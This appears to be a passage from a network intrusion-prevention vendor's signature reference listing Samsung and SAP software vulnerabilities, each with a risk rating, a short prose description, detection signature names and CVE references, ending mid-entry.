About this vulnerability: A vulnerability in Samsung iPOLiS Device Manager
Risk: Moderate
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung iPOLiS Device Manager
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Samsung iPOLiS Device Manager. The vulnerability is due to insufficient input validation in the implementation of the FindConfigChildeKeyList method of the XNSSDKDEVICE.XnsSdkDeviceCtrlForIpInstaller ActiveX control. A remote attacker can exploit these vulnerabilities by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.
Situation: File-Text_Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow
References:
CVE-2014-3912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3912
BID-67823
http://www.securityfocus.com/bid/67823
OSVDB-107722
http://www.osvdb.org/107722
Back to top

Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Samsung iPOLiS Device Manager
Risk: Moderate
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung iPOLiS Device Manager
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Samsung iPOLiS Device Manager. The vulnerability is due to insufficient input validation of a parameter passed to WriteConfigValue() of the XnsSdkDeviceIpInstaller ActiveX control. A remote attacker can exploit this vulnerability by enticing a user to visit a maliciously crafted web page. This can result in code execution in the context of the affected user.
Situation: File-Text_Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow
References:
CVE-2015-0555
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0555
OSVDB-118668
http://www.osvdb.org/118668
Back to top

Samsung-Kies-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in Samsung Kies
Risk: Moderate
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung Kies
Type: Malfunction
Description: There is an arbitrary command execution vulnerability in Samsung Kies. The vulnerability is due to insufficient validation of incoming requests. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a malicious web site. This can result in arbitrary command execution in the context of the affected user.
Situation: File-Text_Samsung-Kies-Arbitrary-Command-Execution
References:
CVE-2012-3807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3807
OSVDB-86501
http://www.osvdb.org/86501
Back to top

Samsung-Net-I-Viewer-Buffer-Overflow

About this vulnerability: A Samsung Net-I Viewer Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung NET-i Viewer
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Samsung NET-i Viewer, versions before 1.37, in the BackupToAvi method, which allows remote attackers to execute remote code via a long string.
Situation: File-Text_Samsung-Net-I-Viewer-Buffer-Overflow
References:
CVE-2012-4333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4333
BID-53193
http://www.securityfocus.com/bid/53193
OSVDB-81453
http://www.osvdb.org/81453
Back to top

Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Samsung Security Manager
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1732-5242
Platform: Generic
Software: Samsung Security Manager
Type: Malfunction
Description: Multiple policy bypass vulnerabilities have been reported in Samsung Security Manager. The vulnerabilities are due to the permitting of unauthenticated PUT, MOVE and DELETE requests on the server. A remote unauthenticated attacker could exploit this vulnerability by sending a PUT, MOVE or DELETE request to the server. Successful exploitation could lead to arbitrary code execution under the security context of the SYSTEM user or a denial of service condition.
Situation: HTTP_Request-DELETE
HTTP_Request-WebDAV-MOVE
HTTP_Request-PUT
HTTP_CRL-Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
References:
CVE-2015-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1499
OSVDB-121464
http://www.osvdb.org/121464
Back to top

Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Samsung SmartViewer
Risk: Moderate
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung SmartViewer
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability exists in Samsung SmartViewer. The vulnerability is due to improper validation of a parameter provided to the BackupToAvi method of the CNC_Ctrl ActiveX Control. A remote, unauthenticated attacker can exploit this vulnerability by enticing the target user to visit a malicious web page. Successful exploitation would allow the attacker to execute arbitrary code on the target in the security context of the currently logged on user.
Situation: File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities
References:
CVE-2014-9265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9265
BID-71486
http://www.securityfocus.com/bid/71486
OSVDB-115479
http://www.osvdb.org/115479
Back to top

Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Out-Of-Bounds-Indexing

About this vulnerability: A vulnerability in Samsung SmartViewer
Risk: Moderate
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung SmartViewer
Type: Malfunction
Description: There exists a remote code execution vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code on the target system in the context of the current user.
Situation: File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities
References:
CVE-2015-8040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8040
Back to top

Samsung-Smartviewer-Stwaxconfig-Memory-Corruption

About this vulnerability: A vulnerability in Samsung SmartViewer
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung SmartViewer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code in the security context of the process.
Situation: File-Text_Samsung-Smartviewer-Stwaxconfig-Memory-Corruption
References:
CVE-2015-8039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8039
Back to top

Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption

About this vulnerability: A vulnerability in Samsung SmartViewer
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Samsung SmartViewer
Type: Malfunction
Description: There exists a memory corruption vulnerability in Samsung SmartViewer. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption
References:
CVE-2015-8039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8039
Back to top

Sangoma-Asterisk-Command-Execution

About this vulnerability: A vulnerability in Sangoma Asterisk
Risk: High
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sangoma Asterisk
Type: Input Validation
Description: There exists a vulnerability in Sangoma Asterisk, multiple versions, which allows remote attackers to execute arbitrary code as the user running Asterisk, due to the insufficient validation of requests to the Asterisk Manager Interface.
Situation: Generic_CS-Sangoma-Asterisk-Command-Execution
References:
CVE-2019-18610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18610
Back to top

SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow

About this vulnerability: A vulnerability in SAP 3D Visual Enterprise Viewer
Risk: Moderate
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP 3D Visual Enterprise Viewer
Type: Buffer Overflow
Description: SAP 3D Visual Enterprise Viewer has a buffer overflow vulnerability in the 3DM file parser, which allows an attacker to run code with the privileges of the logged-on user.
Situation: File-Binary_SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow
Back to top

SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow

About this vulnerability: A vulnerability in SAP 3D Visual Enterprise Viewer
Risk: Moderate
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP 3D Visual Enterprise Viewer
Type: Buffer Overflow
Description: A crafted FLIC file may be used to cause a buffer overflow in the SAP 3D Visual Enterprise Viewer application, allowing unauthorized code execution.
Situation: File-Binary_SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow
Back to top

SAP-Business-One-License-Manager-Buffer-Overflow

About this vulnerability: A SAP Business One License Manager Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP License Manager
Type: Buffer Overflow
Description: A buffer overflow vulnerability in SAP Business One License Manager 2005, versions 6.80.123 and 6.80.320, which allows remote attackers to execute arbitrary code via a long GIOP request to TCP port 30000.
Situation: Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow
Generic_CS-SAP-Business-One-License-Manager-Buffer-Overflow-2
References:
CVE-2009-4988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4988
BID-35933
http://www.securityfocus.com/bid/35933
OSVDB-56837
http://www.osvdb.org/56837
Back to top

SAP-Crystal-Reports-2008-Directory-Traversal

About this vulnerability: A vulnerability in SAP Crystal Reports Server
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Crystal Reports Server
Type: Directory Traversal
Description: An information disclosure vulnerability has been reported in SAP Crystal Reports 2008. The vulnerability is due to insufficient input validation of user input in one of the installed Java Server Pages (JSPs). Remote authenticated attackers may exploit this vulnerability by sending specially crafted HTTP requests to the affected JSP file on the target server. Successful exploitation would allow the attackers to read the content of arbitrary files on the target host.
Situation: HTTP_CRL-SAP-Crystal-Reports-2008-Directory-Traversal
References:
BID-45980
http://www.securityfocus.com/bid/45980
Back to top

SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in SAP Crystal Reports
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Crystal Reports
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in SAP Crystal Reports PrintControl.dll ActiveX Control. The vulnerability is due to a boundary error when parsing the ServerResourceVersion property. A remote attacker can leverage this vulnerability by enticing a target user to open a malicious web page. Successful exploitation would allow an attacker to execute arbitrary code in the security context of the logged in user. An unsuccessful attack could cause an abnormal termination of the affected browser.
Situation: File-Text_SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow
References:
CVE-2010-2590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2590
BID-45387
http://www.securityfocus.com/bid/45387
OSVDB-69917
http://www.osvdb.org/69917
Back to top

SAP-Gateway-Remote-Code-Execution

About this vulnerability: An attempt to exploit a misconfigured ACL leading to remote code execution detected
Risk: High
First detected in: sgpkg-ips-1156-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP
Type: Malfunction
Description: There has been reported that misconfigured ACLs could be used to achieve remote code execution on SAP Gateway systems.
Situation: Generic_CS-SAP-Gateway-Remote-Code-Execution
Back to top

SAP-GUI-Arbitrary-File-Download

About this vulnerability: A SAP GUI Arbitrary File Download vulnerability
Risk: High
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP GUI
Type: Configuration Error
Description: A vulnerability in SAP GUI, versions 6.40 Patch 29 (KWEDIT.DLL 6400.1.1.41) and 7.10 Patch 5 (KWEDIT.DLL 7100.1.1.43), which allows remote attackers to overwrite arbitrary files via the "Comp_Download" method.
Situation: File-Text_SAP-GUI-Arbitrary-File-Download
References:
CVE-2008-4830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4830
OSVDB-53680
http://www.osvdb.org/53680
Back to top

SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass

About this vulnerability: A vulnerability in SAP GUI
Risk: Moderate
First detected in: sgpkg-ips-880-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP GUI
Type: Malfunction
Description: Improper implementation of policy enforcement causes a policy bypass vulnerability in the SAP GUI. A successful exploitation can allow an attacker to execute code remotely with the privileges of the affected application.
Situation: Generic_CS-SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass
References:
CVE-2017-6950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6950
BID-96872
http://www.securityfocus.com/bid/96872
Back to top

SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution

About this vulnerability: A vulnerability in SAP GUI
Risk: High
First detected in: sgpkg-ips-297-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP GUI
Type: Malfunction
Description: There is a vulnerability in the SAP GUI SAPBExCommonResources ActiveX control. The vulnerability is due to a design weakness in the Execute() function of the ActiveX Object BExGlobal. This may allow remote attackers to execute arbitrary commands by enticing the target user to open a maliciously crafted HTML document.
Situation: HTTP_SS-SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
File-Text_SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
Back to top

SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite

About this vulnerability: A file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control
Risk: Moderate
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP GUI
Type: Input Validation
Description: There is a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious web page in Internet Explorer to create or modify arbitrary files. If important system files are overwritten, the system may become non-bootable. By writing a file to the Startup folder, arbitrary code can be executed during the next reboot or logon session.
Situation: HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
HTTP_SS-SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit
References:
BID-34310
http://www.securityfocus.com/bid/34310
OSVDB-58379
http://www.osvdb.org/58379
Back to top

SAP-Internet-Communication-Manager-HTTP-Request-Smuggling

About this vulnerability: A vulnerability in SAP Internet Communication Manager.
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1833-5242
Platform: Windows
Software: SAP
Type: Input Validation
Description: A vulnerability in SAP Internet Communication Manager (ICM), in multiple versions of SAP NetWeaver (Java and ABAP) and SAP Web Dispatcher, which allows remote attackers access to confidential information, passwords and session cookies, and possibly gain unrestricted access to the system by sending a crafted request to the target server, due to improper input validation.
Situation: HTTP_CS-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
HTTP_CSH-SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
References:
CVE-2022-22536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22536
Back to top

SAP-Internet-Graphics-Server-XMLCHART-Xxe

About this vulnerability: A vulnerability in SAP Internet Graphics Servers.
Risk: High
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: SAP Internet Graphics Server
Type: Input Validation
Description: A vulnerability in SAP Internet Graphics Servers, versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53, which allows remote attackers to disclose information due to a lack of validation on the Extension HTML tag when submitting a POST request to the XMLCHART page.
Situation: HTTP_CS-SAP-Internet-Graphics-Server-XMLCHART-Xxe
References:
CVE-2018-2392
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2392
Back to top

SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Buffer Overflow
Description: There is a code execution vulnerability in SAP NetWeaver Message Server. The vulnerability is due to a buffer overflow in the function AdIExecBlkConv while handling a request message. A remote attacker can exploit this vulnerability by sending a specially crafted message to a vulnerable server. This can lead to code execution in the context of the affected service. If code execution is unsuccessful, the service may terminate unexpectedly.
Situation: Generic_CS-SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow
References:
CVE-2013-1593
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1593
OSVDB-90237
http://www.osvdb.org/90237
Back to top

SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Generic
Software: SAP NetWeaver
Type: Directory Traversal
Description: A directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 allows unauthenticated attackers to read arbitrary files via a crafted URL query string. Successful exploitation could lead to the disclosure of sensitive information.
Situation: HTTP_CSU-SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637
References:
CVE-2017-12637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12637
Back to top

SAP-Netweaver-As-Java-CRM-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA CRM detected
Risk: High
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA CRM detected.
Situation: HTTP_CSU_SAP-Netweaver-As-Java-CRM-Remote-Code-Execution
References:
CVE-2018-2380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2380
Back to top

SAP-Netweaver-As-Java-XML-External-Entity

About this vulnerability: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA detected
Risk: High
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: An attempt to exploit a vulnerability in SAP NetWeaver AS JAVA detected.
Situation: HTTP_CRL-SAP-Netweaver-As-Java-XML-External-Entity
References:
CVE-2016-9563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9563
Back to top

SAP-Netweaver-CVE-2020-6287

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: There exists an authentication check vulnerability in SAP NetWeaver. Successful exploitation allows an attacker to create an administrator user or normal user to the target system.
Situation: File-TextId_SAP-Netweaver-CVE-2020-6287
References:
CVE-2020-6287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
Back to top

SAP-Netweaver-Diagieventsource-Denial-Of-Service

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-456-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: There is a denial-of-service vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient validation while parsing incoming requests. The vulnerable "Dispatcher" service by default listens on port TCP/32## (where ## is the SAP system number). A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diag packet to the vulnerable "Dispatcher" service. Successful exploitation can result in a denial of service condition.
Situation: Generic_CS-SAP-Netweaver-Diagieventsource-Denial-Of-Service
References:
CVE-2012-2514
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2514
OSVDB-81760
http://www.osvdb.org/81760
Back to top

SAP-Netweaver-Diagtracehex-Denial-Of-Service

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: There is a denial-of-service vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient validation while parsing incoming requests. The vulnerable "Dispatcher" service listens on port TCP/32## (where ## stands for the SAP system number) by default. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diag packet to the vulnerable "Dispatcher" service. Successful exploitation can result in a denial-of-service condition.
Situation: Generic_CS-SAP-Netweaver-Diagtracehex-Denial-Of-Service
References:
CVE-2012-2612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2612
OSVDB-81760
http://www.osvdb.org/81760
Back to top

SAP-Netweaver-Directory-Traversal

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-1265-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: Improper handling of request data causes a directory traversal vulnerability in SAP NetWeaver. A successful exploit allows an attacker to download files from the target system.
Situation: File-TextId_SAP-Netweaver-Directory-Traversal
References:
CVE-2020-6286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6286
Back to top

SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in SAP NetWeaver's Dispatcher service. The vulnerability is due to insufficient bounds checking while parsing incoming requests. This service listens by default on port TCP/32## (being ## the SAP system number) of a host running the "Dispatcher" service. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted SAP Diagnostic packet to the vulnerable "Dispatcher" service. Successful exploitation can result in code execution in the context of the affected service. If code execution is unsuccessful, the affected service may terminate abnormally.
Situation: Generic_CS-SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow
References:
CVE-2012-2611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2611
OSVDB-81759
http://www.osvdb.org/81759
Back to top

SAP-Netweaver-Enqueue-Server-DoS

About this vulnerability: SAP Netweaver Enqueue Server Trace Pattern Denial of Service Vulnerability
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP NetWeaver
Type: Malfunction
Description: A vulnerability SAP Netweaver that could allow a remote attacker to create a denial of service condition via a specially crafted SAP Enqueue Server packet.
Situation: Generic_CS-SAP-Netweaver-Enqueue-Server-DoS
Back to top

SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in SAP NetWeaver Visual Composer. A remote, authenticated attacker can use this to upload arbitrary files on the affected system, which may lead to arbitrary code execution with the Java Server process privileges.
Situation: HTTP_CSU-SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163
References:
CVE-2021-38163
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38163
Back to top

SAP-Netweaver-Information-Disclosure

About this vulnerability: A SAP Netweaver Information Disclosure vulnerability.
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: A vulnerability in SAP Netweaver 7.03, in the HostControl service, which allows remote attackers to obtain sensitive information via a crafted SOAP request.
Situation: File-TextId_SAP-Netweaver-Information-Disclosure
References:
CVE-2013-3319
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3319
BID-61402
http://www.securityfocus.com/bid/61402
OSVDB-95616
http://www.osvdb.org/95616
Back to top

SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in SAP NetWeaver detected
Risk: High
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Windows
Software: SAP NetWeaver
Type: Malfunction
Description: An attempt to exploit a vulnerability in SAP NetWeaver detected.
Situation: HTTP_CSU-SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution
References:
CVE-2010-5326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5326
Back to top

SAP-Netweaver-Message-Server-Memory-Corruption

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-513-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: A code execution vulnerability has been reported in SAP NetWeaver Message Server. The vulnerability is due to an array index error in the function _MsJ2EE_AddStatistics(). A remote attacker can exploit this vulnerability by sending a specially crafted message to a vulnerable server. This can lead to code execution in the context of the affected service. If code execution is unsuccessful, the service may terminate abnormally.
Situation: Generic_CS-SAP-Netweaver-Message-Server-Memory-Corruption
References:
CVE-2013-1592
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1592
OSVDB-90238
http://www.osvdb.org/90238
Back to top

SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-471-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: A remote command execution vulnerability has been reported in SAP NetWeaver's SOAP interface. The vulnerability is due to insufficient validation of incoming SOAP requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted SOAP request to the affected service. This can result in arbitrary command execution in the security context of the Administrator user.
Situation: File-TextId_SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution
Back to top

SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: A remote command execution vulnerability has been reported in SAP NetWeaver's SOAP interface. The vulnerability is due to insufficient validation of incoming SOAP requests. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted SOAP request to the affected service. This can result in arbitrary command execution in the security context of the affected service.
Situation: File-TextId_SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution
References:
OSVDB-93537
http://www.osvdb.org/93537
Back to top

SAP-Netweaver-Soap-Request-Sxpg_Command_Execute-Command-Execution

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-531-5211
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: A remote command execution vulnerability has been reported in SAP NetWeaver's SOAP interface. The vulnerability is due to insufficient validation of incoming SOAP requests. A remote, authenticated attacker can exploit this vulnerability by sending a specially crafted SOAP request to the affected service. This can result in arbitrary command execution in the security context of the affected service.
References:
OSVDB-93536
http://www.osvdb.org/93536
Back to top

SAP-Netweaver-SQL-Injection-CVE-2016-2386

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: High
First detected in: sgpkg-ips-1478-5242
Last changed: sgpkg-ips-1478-5242
Platform: Generic
Software: SAP NetWeaver
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the SAP NetWeaver J2EE Engine 7.40. This vulnerability affects SAP NetWeaver AS Java UDDI server versions 7.11-7.50. A successful exploit allows an unauthenticated attacker to run arbitrary SQL commands.
Situation: File-TextId_SAP-Netweaver-SQL-Injection-CVE-2016-2386
References:
CVE-2016-2386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2386
Back to top

SAP-Netweaver-Suspicious-Probe-Request

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: This situation detects suspicious probe against SAP Netviewer that is used to exploit vulnerabilities CVE-2020-6286 and CVE-2020-6287.
Situation: HTTP_CSU-SAP-Netweaver-Suspicious-Probe-Request
Back to top

SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324

About this vulnerability: A vulnerability in SAP NetWeaver
Risk: Critical
First detected in: sgpkg-ips-1873-5242
Last changed: sgpkg-ips-1873-5242
Platform: Generic
Software: SAP NetWeaver
Type: Malfunction
Description: An unauthenticated arbitrary file upload vulnerability has been reported in the Metadata Uploader component of the SAP NetWeaver Visual Composer. Successfully exploiting this vulnerability allows remote code execution and can lead to a full system compromise.
Situation: HTTP_CSU-SAP-Netweaver-Visual-Composer-CVE-2025-31324-WebShell-Activity
File-Text_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
File-Name_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
References:
CVE-2025-31324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324
Back to top

SAP-Soap-Information-Disclosure

About this vulnerability: A SAP Soap Information Disclosure vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP SOAP
Type: Insecure Configuration
Description: A vulnerability in the SAP SOAP service which allows remote attackers to obtain sensitive material via an RFC_SYSTEM_INFO request.
Situation: HTTP_CRL-SAP-Soap-Information-Disclosure
References:
CVE-2006-6010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6010
Back to top

SAP-Solution-Manager-Remote-Command-Execution

About this vulnerability: A vulnerability in SAP Solution Manager.
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1753-5242
Platform: Linux; Windows
Software: SAP Solution Manager
Type: Input Validation
